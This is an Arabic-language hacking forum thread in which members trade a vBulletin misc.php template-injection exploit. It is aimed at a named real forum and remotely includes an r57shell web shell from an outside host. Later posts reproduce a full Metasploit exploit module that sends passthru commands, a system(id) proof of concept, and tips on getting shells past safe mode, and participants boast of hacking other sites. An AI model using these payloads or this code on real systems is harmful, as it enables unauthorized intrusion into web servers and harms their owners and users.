السلام عليكم ,,

اليوم جاب لي واحد من الشباب رابط موضوع كاتبه شخص بمنتدى معين ..
وهذا رابط الموضوع
http://www.traidnt.net/vb/showthread.php?t=163479

-------------
عموما كتبت الاستغلال ودخلت للشل وقلت احطه لكم ... لاني يوم جيت بناقش الموضوع حذف الموضوع :d او نقلوه لاقسام خاصه ...
فلذلك

هذا الاستغلال لكل الحبايب |26|

http://www.elqahwa.com/vb//misc.php?do=page&template={${include('http://rst.void.ru/download/r57shell.txt')}}{${exit()}}&


الاستغلال بواسطه (SnIpEr_SA) <-- عشان حقين النقل :(
تحياتي

:D

looooooooooooool

استثمارين في ملف واحد :D

شوووووووووكرا يامتكي وبحمل الملف وبسوي لها ترقيع الان :)


تحياتي

اخوي بس تعديل على اللينك

اللينك هاد غلط

http://www.elqahwa.com/vb//misc.php?do=page&template={${include('http://rst.void.ru/download/r57shell.txt')}}{${exit()}}&


اللينك الصح هوه


http://www.elqahwa.com/vb/misc.php?do=page&template={${include('http://rst.void.ru/download/r57shell.txt')}}{${exit()}}&


وشكرا

:D

looooooooooooool

استثمارين في ملف واحد :D

شوووووووووكرا يامتكي وبحمل الملف وبسوي لها ترقيع الان :)


تحياتي

كفو يابطل ... لاهنت وشاكر مرورك.


ورود القبر شكرا للتعديل ...

اخوي متكي لا شكر على واجب

وعلى فكره اللينك غلط في موقع تريدنت كمان :-) اعدلهم اللينك هههههههه

بس اخواني هلى الثغرة شغالة على النسخ الجديدة 3.5.4 و 3.5.3 ولا هي بس شغالة على 3.0.1

ارجو الافادة

وربي استذا ومبدع
تسلم يدينك
بس هل تنطبق على النسخ الجديدة اخوي متكى
لك ارق التحيات
اخوك
مسمار جحا

مشكورين على الثغرة وتعديلها

ولكن هي على اي نسخة شغالة

؟؟؟؟؟؟؟؟

تحيتي

مشكووووووووووووور والله يعطيك العافيه

ثغرة مميزة ..

يعطيك العافية خيو متكي ...

احترامي يابطل

hiii brother Metaky

sorry 4 my english
i can't write in arabic now

good job 4 both of u

but

to do=
sometimes u Could not cache template file to a bug like this one.because the template_cache dir must be writable (CHMOD 777).

so much arabic site which has VB on it don't give this PERMISSION

I don' know what about u??

just a small inf
^_^
bye

جميل اخي متكي .. تسلم .. سلامي لك يا غالي

I hope not to do it the arabian HaCkErs

it would be a very bad bug

it could has a HIGH RISK

Mr .Super-CrystaL

^_^ !! if u can send me the file without the bug u will be sugar !! ^_^

مشكور اخي الكريم ما قصرت فعلا ثغرة خطيرة

لكن انا عندي سؤال ممكن انه خارج عن الموضوع شوي

كل ما ارفع شل يعني سواء بالثغرة هذه او اي ثغرة دايما طلع معي السيف مود ان

يعني مافي حل للموضوع هذا
معليش عارف انه سؤال غبي من واحد مبتدئ لكن تعبت وانا اقرأ وما في فايدة
اجي ابغى كيف اخليه اوف الاقي الي يشرح دخل في موضوع السيرفر وانا بس كنت ابغى الموقع لا اكثر
تكفي متكي وجهني على موضوع على الاقل لاني ضايع مع الحكاية هذه

AG-Spider
حياك الله جرب على النسخ الجيل الثالث وشوف اللي تضبط معك .. لانها تعتمد على القوالب
eval(fetch_template('phpinclude_start', -1, 0));

eval(fetch_template('phpinclude_end', -1, 0));

تقريبا والمشكله من داله eval كما تفضل العندليب ..

والان ظهر نظام الهوك في النسخ الجديدة .. وممكن تتطور عن طريقه ...

مسمار جحا
تسلم يالغالي من ذوقك ....

ambt

3.0.x

][S.S][

الله يعافيك

الملك18
هلا وغلا عزوز منوور يالغلا...

كيفن ميتنك
i think you feel good :d

Black-Code
الجميل انت ومرورك ...حياك

مـــكـــس
اهلا وسهلا ..... كل مافي الموضوع غير الشل خليك رافع شلاتك txt وغير بينها

بالتوفيق للجميع

جميل جدا يا متكي ,,,

بس لي تعقيب علعنوان للموضوع انه الطفل هذا HM :D

هذا العقرب الاصفر الي ماقصرو بيه الشباب بلقراصنة العرب

ماهي حلوة بحقك يامتكي تذكره بلاستاذ ,, بس ادري ماتعرف انه هو يمكن

والثغرة لها استثمار بشكل ثاني $system اذكر

علعموم كفو ومايجيبها الا اي قدها

خالص تحياتي .

جميل جدا يا متكي ,,,

بس لي تعقيب علعنوان للموضوع انه الطفل هذا HM :D

هذا العقرب الاصفر الي ماقصرو بيه الشباب بلقراصنة العرب

ماهي حلوة بحقك يامتكي تذكره بلاستاذ ,, بس ادري ماتعرف انه هو يمكن

والثغرة لها استثمار بشكل ثاني $system اذكر

علعموم كفو ومايجيبها الا اي قدها

خالص تحياتي .

اول شي احلى ولكم باك باكو :d

كيف الدراسه ان شا الله ماشي الامور..

-----------
تبي تضحك شوف الصوره
http://www.r1s.cc/shell.jpg

الانكلود يدخلك للمجلد اللي عملت الانكلود فيه والرجال ناسي ذا الشغله ومصور الصوره على عماها .... :d

-------------
اما بالنسبه ل $system
بالضبط مثل ماتفضلت تنفع بس اذا كان السيرفر مانعها ! مشكله وقليل اللي مو مانعينها ...

تسلم اخوي متكي على الثغره وعلى الموضوع يعطييك الف عافيه

وما تقصر وانت ما شالهل دوم على هالقوه والله لا يحرمنا منك ومن جديدك

Lool

تسلم قلبي ,,,

بس كلامك صحيح على بعض السيرفرات ,,,

وبلنسبة للطفل هذا منتداه طار من زمان :d ياكثر الي هكروه , واذكر قبل مانتكلم مسنجر اخر مرة

شفتك من قائمة الموجودين الان بلموضوع بلموضوع نفسه بترياق , قلت شكله ناوي عليها

هههههههه

ههههههههههه

يوم لك ويوم عليك ويوم الله يكفيك شره .....

مع تحيات ذكرى ككككككككك

<--- عنده امتحان وقام يلخبط :d
-------------
السنافي هلا وسهلا منور يالغلا...

AG-Spider
حياك الله جرب على النسخ الجيل الثالث وشوف اللي تضبط معك .. لانها تعتمد على القوالب
eval(fetch_template('phpinclude_start', -1, 0));

eval(fetch_template('phpinclude_end', -1, 0));

تقريبا والمشكله من داله eval كما تفضل العندليب ..

والان ظهر نظام الهوك في النسخ الجديدة .. وممكن تتطور عن طريقه ...

حياك الله حبيبي مشكور على توضيحك تسلم يا مبدع

اخوك AG-Spider

السلام عليكم


هلا خوي متكي يارائع انت
وش هالزود الظاهر انها قوية

الا بس شيخنا ورا كل ماجربها على منتدى تظهر لي صفحة بيضا بس ؟؟؟؟

الا على نسخة كم شغالة اخر نسخة ؟؟؟؟

وش الحل في ظهور الصفحة البيضاء هذه

..

الا بس شيخنا ورا كل ماجربها على منتدى تظهر لي صفحة بيضا بس ؟؟؟؟
وش الحل في ظهور الصفحة البيضاء هذه

..

نفس المشكلة معايا أنا ..

ياليت تشوفوا لنا حــل .. !!!

..

يعطيك الف عافيه يالغالي ع الاستثمار
وثغره قويه والله مشكور وماقصرت حبوٍب ولا للأحتكار |34|
تحياتي والى الامام ,,

الثغرة هذه لاترفع الشل على كثير من المنتديات وحتى الكود للتجريب كلما طبق امر في الشل ظهرت

الوجوه التعبيريه والابتسامات ..

وحتى على الجيل الجديد عندما غيرنا بين الدوال كما وضح الأخ متكي الله يوفقه ..

ارجو توضيح هذه النقظة وماهو الحل ليتم رفع الشل وتطبيق الأوامر ..

لن وبكل صدق الثغرة فيها جوانب خفية ويبدو انها حصريه ..

؟؟؟؟؟

سبحان الله وبالله التوفيق

ما شاء الله :) عليك متكى وراء الشمس وتسلم ايدك :)

وعندي الاستغلال اخذته من حسن من زماااااان

بس على العموم مشكوور وماقصرت

بس على فكره الاستغلال غلط مالك :)


تحيااتي لك

اخوووواني والله ان الاستغلال غلط

العقرب الأحمر says:
قول لهم الأستغلال غلط + أن الأخ ناقل الموضوع
العقرب الأحمر says:
http://www.r1s.cc/vb/showthread.php?p=6613#post6613

:) الثغرة عندي وشغاله بس ثغرتكم غلط في غلط
الاسثمار حصري لدى شبكة العقرب الاحمر

ماشاء الله عليك

وتسلم يالغالى

BossNet
ثغرتنا غلط بغلط وهي تدخلك للشل؟ :d

ماعلي عرضها ولا لا بس اهم شي اني اكتشفتها بنفسي ولاخبيتها عن اخواني :)

وبعدين النسخه مهي مستاهله انه يخبي الاستغلال لذا الدرجه

حياكم الله جميعا وشاكر ردودكم ...

السلام عليكم

الثغرة رائعة

لكن أنا تطلع لي صفحة بيضاء !

ممكن حل للصفحة البيضاء ؟!

متكي دائم كبير انت ؟

متكي دائم كبير انت ؟ يسلمووووووووووووووووووووووووو

شباب وش معنى الصفحة البيضاء؟ عند التطبيق على موقع؟

تسلم يا متكى على الثغرة

السلام عليكم ورحمة الله وبركاتة

اخوي متكي بما انك كاتب الموضوع والاكتشاف حبيت اطرح عليك هذا السوال وحاب اسمع الاجابة

منك وتعليقك على هذا اللنك :::

http://www.elqahwa.com/vb/misc.php?do=page&template={${require('http://rst.void.ru/download/r57shell.txt')}}{${exit()}}&


اللينك بشكل واضح ::

http://www.elqahwa.com/vb/misc.php?do=page&template={${require('http://rst.void.ru/download/r57shell.txt')}}{${exit()}}&

وطبعا الكثير يمكن عارف ثغرة misc.php في الاصدارات السابقة من النسخ الفي بي .. الخ

طبعا الترقيع و مكتشف الثغرة كالتالي ::

وللترقيع

الترقيه الي اخر اصدار او الي قبله

مكتشف الثغره
str0ke

تاريخ: 2005-08-03

##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit *****work, please see
# http://metasploit.com/projects/*****work for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

'Refs' =>
[
['MIL', '832'],
],

'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},

'Keys' => ['vBulletin'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";

my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"&@#&@#&@#&@#&@#&@#&@#-Type: application/html\r\n".
"&@#&@#&@#&@#&@#&@#&@#-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine(" Sending the malicious vBulletin Get request...");

$s->Send($req);

my $results = $s->Recv(-1, 20);
$s->Close();

return;
}

1;

المصدر ::

http://www.milw0rm.com/id.php?id=1133


انتظر تعليقك على الموضوع

اخوك / vib_hake

وهذا ايضا رابط للثغرة بالسكورتي وهي قديمة ومكتشفه بتاريخ 2005-02-22


# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]
المصـــــــــــدر

http://www.milw0rm.com/exploits/832

مع اطيب الامنيات

مشكور جدا جدا

بتظهر صفحه بيضاء وتقف رجاء الحل

اخووووي متكى وراء الشمس ..
شفت الاستغلال مالك حق النسخه القديمه .. واظن انها vb3.0.1
واعتقد النسخه الجديده في vb3.5.3 >> الإستغلال حقهاا غير عن النسخه الجديده ...

وتحيااتي للجميع ..

lموضوع جميل فعلا
دائما العطاء من العاصفة

لو سمحتوا يا شباب ما معنى الصفحة البيضاء هل انا كده رفعت الشل ولا لأ وارجو الاجابة لأن اكتر من عضو يسأل ولا حد يرد

اخوي الغالي في فرق بين رفع الشل والانكلود ,, رفع الشل يعني خلاص رفعته على السيرفر لاكن انكلود يعني ضميته عن طريق خطا في البرمجه وشغلته عن طريق الملف المصاب ,,

بما انه يضهر لك صفحه بيضا يعني الثغره مرقعه ,, وهي قديمه مثل ماتفضلو الاخوان ,, بالتوفيق